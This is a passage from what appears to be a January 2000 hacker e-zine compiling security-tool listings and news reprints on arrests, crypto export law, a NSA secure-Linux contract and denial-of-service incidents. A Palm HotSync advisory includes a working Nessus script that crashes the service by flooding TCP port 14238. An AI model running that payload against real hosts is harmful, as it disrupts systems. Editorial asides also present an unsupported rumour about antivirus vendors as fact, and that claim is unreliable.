search),Unix password Crack, Finger over SendMail, Buffer Overlow , Smb Password Check , CRK Files ShadowPortGuard - code for detection of connection on the certain port Shadow Novell NetWare Crack - code for breakings Novell NetWare 4.x And more other functions 2. SecurityFocus.com Pager (Win95/98/NT) by SecurityFocus.com Relevant URL: http://www.securityfocus.com/pager/sf_pgr20.zip This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable). 3. lidentd 1.0p1 (Linux) by Drago, drago@drago.com Relevant URL: http://www.securityfocus.com/data/tools/lidentd-v1.0p1.tgz lidentd is an identd replacement with many features including fake users, random fake users , restricted fake user responses, matching against the passwd file for fake responses and more. 4. Cgi Sonar 1.0 (any system supporting perl) by M.e.s.s.i.a.h Relevant URL: http://www.securityfocus.com/data/tools/CgiSonar.pl.gz 5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris and SunOS) by Craig Rowland, crowland@psionic.com Relevant URL: http://www.securityfocus.com/data/tools/logcheck-1.1.1.tar.gz Logcheck is part of the Abacus Project of security tools. It is a program created to help in the processing of UNIX system logfiles generated by the various Abacus Project tools, system daemons, Wietse Venema's TCP Wrapper and Log Daemon packages, and the Firewall Toolkit) by Trusted Information Systems Inc.(TIS). Logcheck also works very well at reporting on other common operating system security violations and strange events. 6. Secret Sharer 1.0 1.0 (Windows 95/98) by Joel McNamara, joelm@eskimo.com Relevant URL: http://www.securityfocus.com/data/tools/secs.zip Secret Sharer is designed to help people keep secure back-up copies of sensitive data such as PGP (or other cryptosystem) passphrases and confidential files. X. SPONSOR INFORMATION - CORE SDI ------------------------------------------ CORE SDI is an international computer security research and development company. It's clients include 3 of the Big 5 chartered accountant firms for whom CORE SDI develops customized security auditing tools as well as several notable computer security product vendors, such as Network Associates. In addition to providing 'consultant to the consultant' services CORE also performs risk assesment and security infrastructure consulting for a large number of government and fortune 500 companies in both North and Latin America. URL: http://www.core-sdi.com XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION ------------------------------------- 1. How do I subscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of: SUBSCRIBE SF-NEWS Lastname, Firstname You will receive a confirmation request message to which you will have to anwser. 2. How do I unsubscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of: UNSUBSCRIBE SF-NEWS If your email address has changed email aleph1@securityfocus.com and I will manualy remove you. 3. How do I disable mail delivery temporarily? If you will are simply going in vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command: SET SF-NEWS NOMAIL To turn back on e-mail delivery use the command: SET SF-NEWS MAIL 4. Is the list available in a digest format? Yes. The digest generated once a day. 5. How do I subscribe to the digest? To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message body of: SET SF-NEWS DIGEST 6. How do I unsubscribe from the digest? To turn the digest off send a message to LISTSERV with a message body of: SET SF-NEWS NODIGEST If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next. 7. I seem to not be able to unsubscribe. What is going on? You are probably subscribed from a different address than that from which you are sending commands to LISTSERV from. Either send email from the appropiate address or email the moderator to be unsubscribed manually. @HWA 35.0 HNN: Jan 17: NY Student Arrested After Damaging School Computer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A high school student in Long Island New York has been arrested for electronically breaking into his schools computer system. He has been charged with computer tampering and unauthorized use of a computer. Police say that he was caught after bragging about the intrusion to friends and teachers. Damage was estimated at $3,000. WABC News http://abcnews.go.com/local/wabc/news/32275_1142000.html High School Hacker Arrested Long Island authorities have arrested a 17-year-old high school student for hacking into his school district's computer. Suffolk County authorities are charging Keith Billig with computer tampering and unauthorized use of a computer. Billig's is a student at Hauppauge High School. On Wednesday, authorities say Billig gained access to the school district's main frame computer. He allegedly was able to attain the password of every administrator, teacher and student in the district. The computer's internal security system was able to detect Billig's intrusion in the early stages. Police say Billig's bragging about his exploits to teachers and other students is what led them to him. Authorities are not sure what Billig's motive for breaking into the computer system was. Authorities estimate the damage done to the school district's computer system at $3,000. @HWA Where do these guys get these figures from? any sysadmin worth his salt can secure the system in less than an hour... do they get paid $3k/hr down there?? - Ed 36.0 HNN: Jan 17: NSA Wants A Secure Linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Benjamin The NSA has contracted Secure Computing as a sole source provider for a new Linux based secure OS. Secure Computing will integrate its patented Type Enforcement technology they use for the Sidewinder firewall at the OS level. The technology is scheduled to be made available to the public as well as the NSA. PR Newswire - via Yahoo http://biz.yahoo.com/prnews/000113/ca_secure__1.html Thursday January 13, 8:02 am Eastern Time Company Press Release SOURCE: Secure Computing Corporation National Security Agency Selects Secure Computing to Provide Type Enforcement(TM) on Linux OS Secure Computing First to Develop Strong Security Platform for Linux SAN JOSE, Calif., Jan. 13 /PRNewswire/ -- Secure Computing Corporation (Nasdaq: SCUR - news), today announced that it has been awarded a sole source contract by the National Security Agency (NSA) to develop a Secure Linux Operating System (OS). This contract calls for Secure Computing to apply its patented Type Enforcement(TM) technology, to develop a robust and secure Linux platform. This award furthers the goal of Secure to pursue and acquire contracts that will provide enabling technologies to both the Federal government infrastructure as well as commercial electronic business applications. The NSA is the nation's high-technology cryptologic organization that ensures important and sensitive activities in the US intelligence community are protected from exploitation through interception, unauthorized access, or related technical intelligence threats. Secure Computing's patented Type Enforcement technology provides network security protection that is unique to the industry. This technology, first developed under previous government contracts, is available today as part of the UNIX OS for Secure Computing's Sidewinder(TM) firewall. Type Enforcement secures underlying operating systems and protects applications and network services, by segmenting them into domains. Each domain is granted permission to access only specific file types, including executables. As such, each domain provides a self-contained, discrete layer of protection that cannot be altered. Implementing Type Enforcement within the operating system itself assures the highest level of security available in commercial operating systems. ``The NSA has been a long standing customer and partner of Secure Computing,'' said Chris Filo, vice president and general manager of the Advanced Technology Division at Secure Computing. ``Working with the NSA allows Secure to continue to advance the state of the art in security technologies that is required to enable safe, secure operating environments within the Department of Defense (DoD), while at the same time, providing the basis for our future commercial products.'' Linux is a UNIX-type operating system that includes true multitasking, virtual memory, shared libraries, demand loading, proper memory management, TCP/IP networking, and other features consistent with Unix-type systems. The Linux source code is freely available to everyone. About the National Security Agency The National Security Agency (NSA) is the nation's cryptologic organization, tasked with making and breaking codes and ciphers. NSA is a high-technology organization, working on the very frontiers of communications and data processing. The expertise and knowledge it develops provide the government with systems that deny foreign powers knowledge of US capabilities and intentions. The NSA is charged with two of the most important and sensitive activities in the US intelligence community. The information systems security or INFOSEC mission provides leadership, products, and services to protect classified and unclassified national security systems against exploitation through interception, unauthorized access, or related technical intelligence threats. The second activity is the foreign signals intelligence or SIGINT mission, which allows for an effective, unified organization and control of all the foreign signals collection and processing activities of the United States. About Secure Computing Headquartered in San Jose, California, Secure Computing Corporation is a global leader in providing safe, secure extranets for e-business. Secure Computing solutions provide authentication, authorization and secure network access. Secure Computing's worldwide partners and customer base are counted among the Fortune 50 in financial services, healthcare, telecom, communications, manufacturing, technology and Internet service providers, as well as some of the largest agencies of the United States government. For more information, visit Secure Computing Corporation at www.securecomputing.com, or by calling: in Europe, 44-1753-826000; in Asia/Pacific, 61-2-9844-5440, in the U.S., 800-379-4944, or 408-918-6100. NOTE: All trademarks, tradenames or service marks used or mentioned herein belong to their respective owners. This press release contains forward-looking statements relating to the anticipated delivery of Secure Computing's Type Enforcement technology on the Linux operating system and the expected benefits of such technology, and such statements involve a number of risks and uncertainties. Among the important factors that could cause actual results to differ materially from those indicated by such forward-looking statements are delays in product development, competitive pressures, technical difficulties, changes in customer requirements, general economic conditions and the risk factors detailed from time to time in Secure Computing's periodic reports and registration statements filed with the Securities and Exchange Commission. SOURCE: Secure Computing Corporation @HWA 37.0 HNN: Jan 17: Cryptome may be breaking the law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Cryptom May Be Violating the Law contributed by White Vampire Leading Internet civil liberties groups said today that new encryption export regulations released by the U.S. Commerce Department fall short of the Clinton Administration's promise to deregulate the privacy-enhancing technology. One example of this concerns the popular Internet site Cryptom where PGP is made freely available to anyone in the world who wants it. It is unclear with the new regulations whether this is a criminal act or not. Wired http://www.wired.com/news/politics/0,1283,33672,00.html Is This Man a Crypto Criminal? by Declan McCullagh 3:00 a.m. 15.Jan.2000 PST Crypto maven John Young has a problem. He may be a felon, guilty of a federal crime punishable by years in prison. Or he may not be. He'd just like to know one way or another. The 63-year-old architect and owner of the popular Cryptome site has posted a copy of PGP (Pretty Good Privacy) encryption software for the world to download. Also: He Digs 'Through' Gov't Muck More Infostructure in Wired News Read more Politics -- from Wired News PGP, an encryption program that lets users scramble files and email, has become one of the most popular crypto applications online. But people living outside the US have not been able to get it legally from a US Web site. Young's seemingly innocuous act might violate new US government regulations that restrict placing privacy-protecting crypto programs on the Web. Therein lies the uncertainty. The rules are much less onerous than the previous version, but they still apply. And they're so labyrinthine and convoluted that even lawyers who specialize in the area declined to guess whether or not Young has run afoul of President Clinton's executive order and Commerce Department regulations. "The fact that questions still remain about what does and does not violate the law demonstrates that these regulations continue to cloud the situation," said David Sobel, general counsel of the Electronic Privacy Information Center. So Young decided to be intrepid -- and perhaps risk a confrontation with the Feds. "If it's not right, someone will tell me. If I go to a lawyer to ask, they'll advise caution. Every time I go to a lawyer they advise me not to do it, so I don't go any more," he said. The Department of Commerce, which published the regulations and is in charge of arresting crypto-miscreants, declined to comment. Eugene Cottilli, a spokesman for the Commerce's bureau of export administration, could not secure an official response from government lawyers on Friday. Complicating matters is the different way that the regulations treat ready-to-use binary software, and the human-readable source code that must be compiled to be used. On Friday, Young posted a copy of PGP Freeware Version 6.5.2a for Windows and Macintosh, which contains binary code. The regulations appear to say that Americans can only distribute it online if the government has previously "reviewed and classified" the software as acceptable for distribution. Under the old rules, Web sites could distribute binary code only if they checked the Internet address of the recipient and attempted to verify that it was a computer inside the US. MIT, which makes PGP available, has a system that does just that. But Young's site doesn't include the foreigner-verification check, and he said overseas visitors have already been downloading the software. The uncertainty -- and possibility of criminal prosecution -- doesn't faze Young. "People are saying the regs are deliberately vague so you'll censor yourself, so I tend to go the other way," he said. "I'm hoping this will lead to clarification." Source code, on the other hand, is a bit freer. As long as it's not subject to an onerous license and as long as you email the site's address to the Commerce Department, Web posting appears to be permitted. Some cryptographers have already done just that. "I'm willing to give it a try," wrote cryptographer Wei Dai on an encryption mailing list. "I sent an email to BXA [Bureau of Export Administration] and got no reply. The rules do not say I need permission, just notification, so Crypto++ is now available for unrestricted download." Dai maintains the Crypto++ library of C++ encryption routines, including authentication programs and ciphers. Soon after, the text of the Electronic Frontier Foundation's Cracking DES book appeared online. http://www.shmoo.com/crypto/Cracking_DES @HWA 38.0 HNN: Jan 21: H4g1s Member Sentenced to Six Months ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by extension Jason Mewhiney, the Canadian who defaced a NASA web page back in 1997, has been sentenced to 6 months in prison and ordered to pay a $6000 fine. Mewhiney pleaded guilty to 12 of the 51 charges against him, including committing mischief to data stored and fraudulent use of a NASA computer system. NASA estimated the damages caused by the intrusion at $70,000. (And how much did it cost to prosecute the case?) Canadian Press - via Yahoo http://ca.dailynews.yahoo.com/ca/headlines/cpress/tc/story.html?s=v/ca/cpress/20000118/tc/technology_461022_1.html Monday January 17 11:48 PM ET Man sentenced to six months in jail after pleading guilty to computer hacking SUDBURY, Ont. (CP) - A man was sentenced to six months in jail and fined $6,000 Monday after pleading guilty to computer hacking related charges, including altering NASA's Web site. Jason Mewhiney, 22, went into the space agency's Web site March 5, 1997, leaving a message that called for an end to the commercialization of the Internet and freedom for two hackers in jail for computer crimes. Justice John Poupore compared Mewhiney's actions to that of a "safecracker" trying to steal money from a bank. "Mr. Mewhiney, you ought not to leave this courtroom with a badge of honour in the computer community," the judge said Monday. "You sir, are a convicted criminal. That is a distinction you will carry with you for the rest of your life. It is nothing to be proud of." Mewhiney, of Val Caron, outside of Sudbury, pleaded guilty to 12 of the 51 charges he was facing, including committing mischief to data stored and fraudulent use of a NASA computer system. He was able to access dozens of computer systems by using programs that crack password codes. The space agency's home page was put briefly out of service for repair, at an estimated cost of $70,000. NASA and FBI computer crime teams caught Mewhiney by tracing his movements. Mewhiney told the court he was sorry. "I'd just like to say I'm sorry and I'm sorry for everyone's time I've wasted," he said. RCMP searched his parent's home in the spring of 1998 and found a paper with numerous computer system passwords on them. The judge agreed to a request by assistant Crown attorney Patricia Moore that Mewhiney's computer and other papers seized by police be confiscated. One of his probation conditions was that he not possess a computer. (Sudbury Star) © The Canadian Press, 2000 @HWA 39.0 HNN: Jan 21: Smurf Attack Felt Across the Country ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dark Knight A small ISP in Seattle WA, Oz.net, suffered a major Smurf attack last weekend that was felt across the country. The denial of service attack is estimated to have been launched from 2000 systems nationwide. 70% of the traffic in the Washington State area was said to have been effected. MSNBC http://www.msnbc.com/local/KING/483728.asp 404 my dr00gies, sorry article unavailable... @HWA 40.0 HNN: Jan 21: CIHost.com Leaves Customer Info On the Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench CIHost.com, a web hosting company based in Texas, left over 1500 customer records available on the internet for anyone with a web browser to read. CIHost said that the database had been moved to a server so an outside developer could have access to the information and by mistake password protection was omitted. The customer records included information such as name, credit card type, credit card number, and the amount charged. MSNBC http://www.msnbc.com/news/360102.asp (fuck MSSNBC and their bullshit page design) @HWA 41.0 HNN: Jan 21:False Bids Submitted, Hackers Blamed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench False bids on an online auction for a dinosaur skeleton have been blamed on 'hackers'. False bids of up to $15 million where submitted by people with names such as 'stevebert' and 'dumbass507'. The bidding procedure has been revamped to prevent this from occurring again however no details where given as to exactly what security measures where put in place. (It is amzing how many different definitions of the word 'hacker' exist) BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_608000/608634.stm Tuesday, 18 January, 2000, 17:52 GMT Hackers attack dinosaur auction Dinosaur hunters with their quarry: Alan Detrich (left) and Fred Nuss By BBC News Online's Damian Carrington An online auction for a complete Tyrannosaurus rex skeleton was attacked by malicious hackers on Tuesday who filed 17 false bids. At least six of these made it through security measures specifically put in place to prevent such action. "Some people found a way around that process and they have been removed," confirmed Brian Payea, public relations manager for Lycos. He told BBC News Online: "There are no valid bids so far." Bank chat The first attempt to auction the 11-metre fossil dinosaur on eBay was scuppered by prank bids of up to $8m. However, this time, the new auctioneers Lycos Auction had teamed up with the website millionaire.com to try to verify the wealth of bidders before they made their offer. Mr Payea described what should have happened: "You fill in a form, that is sent to millionaire.com and they review it and have a conversation with your bank. The approval is given and someone can bid." However, hackers named "mrmanson20", "stevebert" and "dumbass507" found a hole and posted bids of up to $15m, well over the reserve price of $5.8m. No credit compromise Mr Payea declined to give details of what happened: "How the whole process works is proprietary and I'm not going into detail about it. But we are very confident it couldn't be done again." He added that: "The hiccup does not compromise anybody's credit information - that is all encrypted and very secure." The auction opened on Monday but Mr Payea was not concerned that no verified bids had yet been received: "It takes at least 24 hours for the approval process to be completed. In any case, I think it will take people a little while to commit to that kind of purchase - if it was me, I'd be having a chat with an accountant or two before I bid." Million dollar bones Even the reserve price may appear high but in 1997 a T. rex was bought for $8.36m by the Field Museum in Chicago, US. The deal on this skeleton does include delivery from its current home in a Kansas warehouse. However, the bones are only partly exposed from the rock blocks in which they were found. The 65 million-year-old fossil was discovered on a South Dakota cattle ranch in 1992. Owner Alan Detrich says he sees nothing wrong with auctioning off a piece of the Earth's history. After all, he said, he spent more than $250,000 of his own money unearthing the dinosaur. And he will give 10% of the proceeds to the owners of the cattle ranch where the rock-encased skeleton was found, he says. "This auction is open to the world. If we don't have the right to (sell the fossil), then we don't live in America. If we didn't go there and get him, he'd still be up there." Mr Detrich added that he does not mind if his T. rex becomes a corporate mascot or is sold to a private collector with no intention of displaying it publicly. Chuck Schaff, at the Museum of Comparative Zoology at Harvard University, said the fossil would be ideal for drawing crowds to a museum, but was probably too expensive for most. "It's not unethical to sell it, it's just a shame it goes to the highest bidder," Mr Schaff says. "Some specimens do get away from scientists, but that's life. It's sad, though." The auction, which began on Monday, is due to close at 0100 GMT on 11 February 2000. @HWA 42.0 HNN: Jan 21: UK to create cyber force ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by deepquest The UK National Criminal Intelligence Service (NCIS) has been assigned £337,000 to draw up plans for establishing a cyber crime squad. This online cyber force will be used to combat online fraud, money laundering, distributing pornography and information about pedophilia, and electronic intrusions. The Guardian Unlimited http://www.newsunlimited.co.uk/uk_news/story/0,3604,123365,00.html 'Cyberforce' to fight online crime Monday January 17, 2000 A national "cyberforce" of computer specialists is to be established by the home office to police the internet and combat a rising tide of online crime. It was confirmed last night that the home secretary, Jack Straw, has assigned £337,000 to the UK National Criminal Intelligence Service (NCIS) to draw up plans for establishing a squad to counter criminal activity on the web. The move, which will target those using computers for fraud, money laundering, distributing pornography and information about paedophilia, and hacking, follows a three-year NCIS study of internet crime which concluded that illegal activity on the web, from email viruses to cyber-stalking, is increasing as the wired population grows. Operation Trawler highlighted the inadequacies of anti-computer crime units, leading to calls for a dedicated organisation. The new unit is expected to include experts in the private sector, the Inland Revenue and police. It will also draw on resources available through links with MI5 and GCHQ - the government agency that eavesdrops on Britain and the world's communications networks. Roger Gaspar, the director of intelligence at NCIS, and David Phillips, the chief constable of Kent and head of the crime committee at the Association of Chief Police Officers are drawing up plans for the unit, which will also make use of links with American intelligence organisations and the FBI. Barry McIntyre @HWA 43.0 HNN: Jan 21: Army Holds Off Cyber Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench System Administrators at Redstone Arsenal in Alabama are proud that they withstood the Y2K onslaught of cyber intruders. However, they go on to admit that in the past three months Redstone has been hit with 17 denial of service attacks of which twelve succeeded, and that they have had three web sites breached in the last year. (The interesting part of this article is at the end where the administrator admits that his network has a single point of failure.) Government Executive Magazine http://www.govexec.com/dailyfed/0100/012100j1.htm January 21, 2000 DAILY BRIEFING Army outpost held off hackers in New Year's showdown By Joshua Dean jdean@govexec.com Shortly after dark on New Year's Day, the pager on the belt of Steve Carey, chief of information assurance at the Army's Redstone Arsenal in Alabama, went off. The message was alarming: a hacker was trying to crack into a critical server that keeps track of network identities and passwords at the arsenal. When Carey got to the arsenal's network management center, he found the system protections had withstood the attack and all was well. But Carey and his staff couldn't rest. Attackers continued trying to breach the arsenal's computers and its Web sites as the new millennium dawned. Some other government sites were spared attacks during the New Year's holiday, even though they had braced for the worst. But Redstone is a particularly attractive target for high-tech bandits. The arsenal has technical information on 14 of the Army's top 29 weapons systems, including missiles, helicopters and conventional aircraft. It also handles about 63 percent of the Army's foreign military sales. This means transfers of money as well as weapons technology. "It's big bucks," said Col. Douglas S. Brouillette, who heads the arsenal's Intelligence and Security Directorate. As a result, security experts in Redstone's Local Computer Incident Response Team (LCIRT) are constantly vigilant and in many ways ahead of other agencies when it comes to handling network attacks. LCIRT uses a number of computer intrusion detection systems. But even places such as Redstone, where computer security is a high priority, can't get all the technology resources they need. So instead of relying entirely on technology, the arsenal depends on people to remain alert against attacks. "We have a high level of monitoring because we don't have all the firewalls we need installed yet. We hope the monitoring compensates for that," Brouillette said. "Monitoring allows us to detect, immediately react and fix attacks until we get all the firewalls and other security products installed." Redstone's basic defense is to find attacks quickly in order to stop them as they happen, he said. Contract analysts from Intergraph Federal Systems serve with Carey on his defense team. Redstone needs all the help it can get, because its networks are peppered with attacks daily. "We've had hundreds of incidents in the last three-month period," Brouillette said. "That's 3,000 to 4,000 scans of the network." Hackers conduct scans to try to find out what hardware and software are present on a given network. Scans can discover computers or even modems with open links to the Internet. Unknown hackers who appeared to be from countries including Bulgaria, China, Hungary, Israel, Latvia, Lithuania, Macedonia, Poland, Portugal, Romania and Russia have scanned Redstone over the past three months. But because hackers can make it look as if they were on a computer in a different country, pinning them down geographically is an imperfect science. Once the reconnoitering is complete, hackers try to exploit vulnerabilities and gain access to private networks and the information stored there. Without intrusion detection systems and expertise, network staff may never know they've been hacked. Beyond scanning and attempted break-in, hackers can cripple networks and servers by launching "denial-of-service" attacks. In such incidents, intruders launch a flood of messages to a single server, overwhelming it. Denial of service attacks have become so commonplace that they come with colorful names, such as Ping Flood, SMURF, SYN Flood, UDP Bomb and WinNuke. Over the past three months Redstone has been hit with 17 denial of service attacks. Twelve of them succeeded. And then there are the vandals—Internet gang members armed with digital spray paint—that LCIRT must contend with. "Three of our Web sites have been breached in the past 12 months," Carey said. In the successful attacks, the methods were new to the network defenders, which meant the attackers were able to change the Web sites. Once LCIRT members discovered how the hackers pulled off the attacks, they went through every base Web server to make sure vulnerabilities were fixed. Because of past vigilance, the New Year's vandals failed to make a dent. LCIRT members say new attacks and techniques are constantly appearing, and the only way to stop them is to have a team monitoring the network and the logs of the intrusion detection systems. That's how the arsenal's defenders knew the New Year's hackers were aiming deliberately for one of Redstone's most sensitive servers. "If you get into that server you can go anywhere in the installation," Brouillette said, breathing a sigh of relief now that 2000 is well under way and his servers are intact @HWA 44.0 HHN: Jan 24: French smart card expert goes to trial ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by sian An expert in smart card technology has been arrested and faces up to seven years in jail, and a fine of £500,000 after he designed a fake smart card that could be used to defraud 'any cash terminal'. Serge Humpich then offered the spoofed card to French banks in exchange for £20 million. The banks accused him of blackmail. The UK Register http://www.theregister.co.uk/000123-000005.html (using some sucky html that fucks up c&p) @HWA 45.0 HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by kingpin We don't usually cover individual security vulnerabilities here at HNN but this one is interesting. The Palm HotSync Manager is vulnerable to DoS attack which may also crash the system and possibly allow the execution of arbitrary code. Anyone who runs HotSync Manager over the network is a potential target of attack. Beyond-Security's SecuriTeam http://www.securiteam.com/exploits/Palm_HotSync_Manager_is_vulnerable_to_Denial_of_Service_attack.html Title Palm HotSync Manager is vulnerable to Denial of Service attack Summary HotSync Manager provides network synchronization between the Palm Desktop and a remote Palm PDA that is connected via the Internet. This feature is used to backup the information from the Palm PDA to a secure location. However, using HotSync Manager over the network exposes it to an attack, where anyone with network connection to the station running HotSync Manager can crash the application and possibly execute arbitrary code. Details Vulnerable systems: HotSync Manager 3.0.4 under Windows 98 Non vulnerable systems: HotSync Manager 3.0.4 under Windows 2000 Exploit: By connecting to the HotSync Manager's TCP listening port (TCP port 14238), and sending a large amount of data followed by a newline, it is possible to crash the HotSync Manager. The following Nessus Plugin can be used to test this: # # This script was written by Noam Rathaus <noamr@securiteam.com> # # See the Nessus Scripts License for details # # if(description) { name["english"] = "HotSync Manager Denial of Service attack"; script_name(english:name["english"]); desc["english"] = "It is possible to cause HotSync Manager to crash by sending a few bytes of garbage into its listening port TCP 14238. Solution: Block those ports from outside communication Risk factor : Low"; script_description(english:desc["english"]); summary["english"] = "HotSync Manager Denial of Service attack"; script_summary(english:summary["english"]); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam"); family["english"] = "Windows"; script_family(english:family["english"]); exit(0); } # # The script code starts here # if (get_port_state(14238)) { sock14238 = open_sock_tcp(14238); if (sock14238) { data_raw = crap(4096) + string("\n"); send(socket:sock14238, data:data_raw); close(sock14238); sleep(5); sock14238_sec = open_sock_tcp(14238); if (sock14238_sec) { security_warning(port:14238, data:"HotSync Manager port is open."); } else { security_hole(port:14238); } } } Additional information 3Com's Palm computing team is aware of the problem and will fix this issue in the next release of the HotSync Manager. @HWA 46.0 HNN: Jan 24: Viruses Cost the World $12.1 Billion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HWA Comment: I'll say this as a RUMOUR or MYTH in order to avoid possible libel charges but it was a well known fact that certain (very well known and established) Anti-Virus vendor(s) ran underground BBS's (dial up bulletin boards) in the 80's and later special backdoored FTP sites in the 90's for the purpose of virus authors to upload new viruses to be deployed into the wild so that the AV companies could capitalize on these new 'threats'....so when I read about costs like this I really wonder how much was premeditated by the AV companies themselves in order to make a buck from susceptible companies and people that refused to practice safe computing....trust noone, except maybe AVP. You can debate this if you like but I know it is fact, I was there and had access to these sites. - (HWA Trusted source) From HNN http://www.hackernews.com/ contributed by nvirb According to a recent study conducted by Computer Economics, a California based computer consulting firm, the world spent $12.1 billion last year in a war against malicious self replicating code. The $12.1 Billion figure is based on lost productivity, network downtime and the expense involved in getting rid of the virus. (Hmmmm, that number seems ridiculously large.) APB News http://www.apbnews.com/newscenter/internetcrime/2000/01/20/virus0120_01.html Computer Viruses Cost $12 Billion in 1999 Report Tallies Business Impact of 'Economic Terrorism' Jan. 20, 2000 By David Noack CARLSBAD, Calif. (APBnews.com) -- Businesses around the world spent $12.1 billion last year in a war against "economic terrorism" in the form of malicious computer viruses, according to a new study. Computer Economics, a computer consulting firm here, has found that the economic impact of virus attacks on information systems around the world are taking a heavy financial toll on business. For the most part, computer security concerns have focused on hackers trying to gain entry into a company's computer system, rifling through files and possibly stealing sensitive and confidential information. But viruses, especially those delivered in e-mail, are giving corporate information technology managers something new to worry about. Lost productivity and downtime Samir Bhavnani, the analyst with Computer Economics who conducted the study, said the $12.1 billion is based on lost productivity, network downtime and the expense involved in getting rid of the virus. "This form of economic terrorism is growing as viruses are no longer the minor annoyances that they were a few years ago," Bhavnani said. "Now they can verge on the catastrophic and cause major predicaments for any organization." He said for the first six months of last year, financial losses caused by computer viruses totaled $7.6 billion. Bhavnani said that companies must devote time to teaching their employees "prudent workstation use." Delivery began to change "Simple things like refraining from downloading unnecessary and non-work-related items from the Internet, opening executable files sent via e-mail or frequenting pornographic Web sites will increase the security level and reduce the vulnerability of valuable corporate resources," Bhavnani said. A survey conducted last year by Information Security magazine asked information technology managers where they experienced the most security breaches. Seventy-seven percent said computer viruses were the No. 1 problem, followed by unauthorized access by employees and hackers and the theft and destruction of computing resources. Last year, a series of malicious viruses clogged e-mail networks, crashed computers and erased hard drives. The way that viruses are delivered began to change. The "Bubbleboy" virus was activated when unsuspecting users opened an infected e-mail. In the past, computer viruses were spread through attachments, and e-mail was generally regarded as safe. 'High-profile damage' With computer virus alerts coming sometimes on a daily basis, security experts say that businesses are still not taking virus prevention seriously. "Despite all of the high-profile damage caused by viruses, organizations are still just beginning to implement adequate security plans," said Michael Erbschloe, vice president of research at Computer Economics. "Additionally, many firms are reluctant to report damages because they feel they may be identified as an easy target." The study says that in the past three years there has been a major programming shift as viruses have become far more malicious and are designed specifically for destruction and damage. The study said that computer viruses were initially designed to create a minor annoyance. Now they are very complex and come in a multitude of forms, and many are polymorphic, which means they change while in a computer to avoid detection from anti-virus software. Melissa and Explorer encouraged copycats "The Melissa and Explorer.zip viruses acted as a catalyst in 1999," said Erbschloe. "Organizations started to realize the severity and the malicious intent of most new computer viruses and began to take the cries for increased security spending more seriously." Steven Ross, a director at Deloitte & Touche's Enterprise Risk Services Practices, said computer viruses are having a noticeable impact on companies. "The first wave of viruses 10 years ago attacked at the operating system level. The ones we see today are attacking at the application level. The filters that come into play when you boot up aren't necessarily capturing the things that are happening at the application level," said Ross. He said there may only be a handful of smart computer writers, and that there are hundreds and thousands so-called script kiddies who when taught to program a virus can do so without much effort. Writers rely on 'general complacency' "There is also a general complacency. ... They are absolutely counting on it," said Ross. He cited an example of removing 7,500 viruses from a number of servers for a company. When he returned the next week, there were 1,500 more viruses. Dan Schrader, vice president of new technology at Trend Micro, an anti-virus software company in Silicon Valley, said the $12.1 billion figure is "conceivable," and "I am not at all surprised by that number." "If you want to label what the year [1999] was in technology, the first label would be the year of the IPO, and the second label would be the year of the computer virus. There were more serious computer virus outbreaks in any one month of last year than we've had virtually in the entire history of computing," said Schrader. He said there was "tremendous innovation" among computer virus writers, and for the first time the virus writers got it that it's "all about the Internet." "There is lost data, lost productivity while you wait for the tech guy to come around, and then there's the e-mail systems being shut down," Schrader said. "One of the more common ways for companies to respond to news of a new virus outbreak is to do a pre-emptive shutdown of their e-mail system. ... It's the main way that computer viruses are spread." David Noack is an APBnews.com staff writer (david.noack@apbnews.com) @HWA 47.0 HNN: Jan 24: L0pht and @Stake Create Controversy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Someone gets a grant or has a merger with a commercial company and suddenly they have "SOLD OUT" become "NARQS" or the like, pure BS The l0pht is long overdue its break in the security field, so just chill and let them do their thang, you're just jealous you ain't got what it takes to make the grade yourself. - Ed From HNN http://www.hackernews.com/ contributed by Weld Pond The recent merger of the hacker think tank L0pht Heavy Industries with security services company @Stake has created an immense buzz within the industry. Unfortunately some journalists (well one actually) don't seem to get it and have published some potentially libelous comments regarding the merger. ZD Net http://www.zdnet.com/pcweek/stories/news/0,4153,2420340,00.html Other writers seem to have more legitimate 